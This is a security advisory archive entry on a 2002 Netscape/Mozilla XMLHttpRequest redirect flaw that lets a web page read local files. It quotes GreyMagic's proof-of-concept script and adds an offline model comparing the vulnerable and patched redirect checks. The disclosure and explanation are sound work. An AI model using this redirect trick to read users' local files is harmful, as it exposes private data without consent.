SecurityTracker.com

SecurityTracker
Archives

Category:   Application (Web Browser)  >   Netscape Vendors:   America Online, Inc.
Netscape Browser XMLHTTP Redirect Bug Lets Remote Users View Files on a User's Computer
SecurityTracker Alert ID:  1004186
SecurityTracker URL:  http://securitytracker.com/id/1004186
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Apr 30 2002
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 6.1 and above
Description:   An access control vulnerability was reported in the Netscape browser. A remote user can supply HTML that, when loaded by a victim, can read the contents of files on the victim's computer.

GreyMagic Software reported that Netscape (6.1+) on Windows is vulnerable but that other versions and platforms are also believed to be vulnerable.

The vulnerability reportedly exists in the XMLHTTP component (the "XMLHttpRequest" object) and is similar to a previously disclosed flaw in Microsoft Internet Explorer.

A remote user can apparently write HTML that directs the "open" method at a web page which in turn redirects the browser to a local file, while Netscape continues to treat the redirected response as if it were still in the original security zone. As a result, the code can read the file through the responseText property.

A demonstration exploit example is provided. The code reportedly attempts to read the file "c:/test.txt"; the page "getFile.asp" internally redirects to "file://c:/test.txt":

var oXML=new XMLHttpRequest();          // create the XMLHTTP request object
oXML.open("GET","getFile.asp",false);   // synchronous GET to a same-origin page that redirects to file://c:/test.txt
oXML.send(null);                        // the redirect is followed without re-checking the new URL
alert(oXML.responseText);               // the local file's content is exposed as responseText
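The following is an added model of the flaw, not code from the advisory or from the Netscape/Mozilla code base. It simulates a redirect-following fetch against an in-memory "server" (the origin attacker.example, the file path and the response bodies are constructed), and assumes, as the advisory describes, that the vulnerable check is applied once to the URL passed to open() and never to the redirect target; the hardened variant re-applies the same check to every hop.

```javascript
// Added example, not code from the GreyMagic advisory or from Mozilla: a small
// model of a redirect-following XML fetch with an in-memory "server", so it
// runs offline. Origins, paths and bodies below are constructed for the demo.
const PAGE_HREF = "http://attacker.example/page.html"; // constructed: the page calling open()

// Constructed responses. getFile.asp answers with a 302 to a local file, as in
// the advisory. Keys are normalised through the URL parser so lookups match href.
const RESPONSES = new Map(Object.entries({
  "http://attacker.example/getFile.asp": { status: 302, location: "file://c:/test.txt" },
  "http://attacker.example/data.xml":    { status: 200, body: "<ok/>" },
  "file://c:/test.txt":                  { status: 200, body: "SECRET LOCAL CONTENT" },
}).map(([k, v]) => [new URL(k).href, v]));

// The access check a browser applies: web scheme only, same origin as the page.
function allowedByPolicy(url, pageOrigin) {
  return (url.protocol === "http:" || url.protocol === "https:") && url.origin === pageOrigin;
}

// Shared redirect loop. `checkEveryHop` decides whether the policy is re-applied
// after each Location header (fixed behaviour) or only once up front (the bug).
function fetchWithRedirects(target, checkEveryHop) {
  const pageOrigin = new URL(PAGE_HREF).origin;
  let url = new URL(target, PAGE_HREF);
  if (!allowedByPolicy(url, pageOrigin)) return { blocked: url.href };
  for (let hop = 0; hop < 5; hop++) {
    const r = RESPONSES.get(url.href);
    if (!r) return { error: "no response for " + url.href };
    if (r.status !== 302) return { body: r.body, finalUrl: url.href };
    url = new URL(r.location, url); // resolve Location against the current URL
    if (checkEveryHop && !allowedByPolicy(url, pageOrigin)) return { blocked: url.href };
  }
  return { error: "too many redirects" };
}

// Vulnerable model: the zone check runs once, against the URL given to open().
function fetchVulnerable(target) { return fetchWithRedirects(target, false); }
// Hardened model: each redirect target must pass the same check before it is followed.
function fetchHardened(target) { return fetchWithRedirects(target, true); }

console.log("vulnerable:", fetchVulnerable("getFile.asp"));
console.log("hardened:  ", fetchHardened("getFile.asp"));
```

The vulnerable model returns the local file's body with a file: final URL; the hardened one stops at the redirect hop and reports the blocked file: URL, while an ordinary same-origin request (data.xml) still succeeds.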

The vendor has reportedly been notified.

Impact:   A remote user can supply HTML to the target user so that, when loaded by the target user, the code will be able to access files on the target user's computer.
Solution:   No solution was available at the time of this entry.
Vendor URL:  browsers.netscape.com/browsers/main.tmpl
Cause:   Access control error, State error
Underlying OS:  Linux (Any), Apple (Legacy "classic" Mac), UNIX (macOS/OS X), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Confirms and Offers Workaround) Re: Netscape Browser XMLHTTP Redirect Bug Lets Remote Users View Files on a User's Computer
The vendor has confirmed the vulnerability and indicates that a patch is pending.
(Vendor Issues Fix) Re: Netscape Browser XMLHTTP Redirect Bug Lets Remote Users View Files on a User's Computer
The vendor has issued a fix.



Source Message Contents

Subject:  Reading local files in Netscape 6 and Mozilla (GM#001-NS)


GreyMagic Security Advisory GM#001-NS
=====================================

By GreyMagic Software, Israel.
30 Apr 2002.

Available in HTML format at http://security.greymagic.com/adv/gm001-ns/.

Topic: Reading local files in Netscape 6 and Mozilla.

Discovery date: 30 Mar 2002.

Affected applications:
======================

* All tested versions of Mozilla (0.9.7+) on Windows, other
versions/platforms are believed to be vulnerable.

* All tested versions of Netscape (6.1+) on Windows, other
versions/platforms are believed to be vulnerable.


Important notes:
================

Netscape was contacted on 24 Apr 2002 through a form on their web site and
through email to security@netscape.com and secure@netscape.com.

They did not bother to respond AT ALL, and we think we know why.

A while ago Netscape started a "Bug Bounty" program, which entitles
researchers who find a bug that allows an attacker to run unsafe code or
access files to a $1000 reward.

By completely disregarding our post Netscape has earned themselves a $1000
and lost any credibility they might have had. The money is irrelevant, but
using such a con to attract researchers into disclosing bugs to Netscape is
extremely unprofessional.

Netscape's faulty conduct made us rethink our disclosure guidelines and we
came to the following decisions:

* Release all future Netscape advisories without notifying Netscape at all.

* Advise the security community to do the same. Netscape is deceiving
researchers and should not be rewarded.

* Advise customers to stop using Netscape Navigator through our security
advisories and business contacts.


[1] http://home.netscape.com/security/bugbounty.html


Introduction:
=============

XMLHTTP is a component that is primarily used for retrieving XML documents
from a web server.

On 15 Dec 2001 "Jelmer" published an advisory titled "MSIE6 can read local
files", which demonstrated how Microsoft's XMLHTTP component allows reading
of local files by blindly following server-side redirections (patched by
MS02-008).

[1] http://www.xs4all.nl/~jkuperus/bug.htm
[2] http://www.microsoft.com/technet/security/bulletin/MS02-008.asp

Discussion:
===========

Mozilla's version of XMLHTTP, the XMLHttpRequest object, is vulnerable to
the exact same attack.

By directing the "open" method to a web page that will redirect to a
local/remote file, it is possible to fool Mozilla into thinking it's still in
the allowed zone, therefore allowing us to read it.

It is then possible to inspect the content by using the responseText
property.


Exploit:
========

This example attempts to read "c:/test.txt"; "getFile.asp" internally
redirects to "file://c:/test.txt":

var oXML=new XMLHttpRequest();          // create the XMLHTTP request object
oXML.open("GET","getFile.asp",false);   // synchronous GET to a same-origin page that redirects to file://c:/test.txt
oXML.send(null);                        // the redirect is followed without re-checking the new URL
alert(oXML.responseText);               // the local file's content is exposed as responseText


Solution:
=========

Users of Netscape Navigator should move to a better performing, less buggy
browser.


Tested on:
==========

Mozilla 0.9.7, NT4.
Mozilla 0.9.9, NT4.
Mozilla 0.9.9, Win2000.
Netscape 6.1, NT4.
Netscape 6.2.1, Win2000.
Netscape 6.2.2, NT4.
Netscape 6.2.2, Win2000.


Demonstration:
==============

A fully dynamic proof-of-concept demonstration of this issue is available at
http://security.greymagic.com/adv/gm001-ns/.


Feedback:
=========

Please mail any questions or comments to security@greymagic.com.

Copyright 2021, SecurityGlobal.net LLC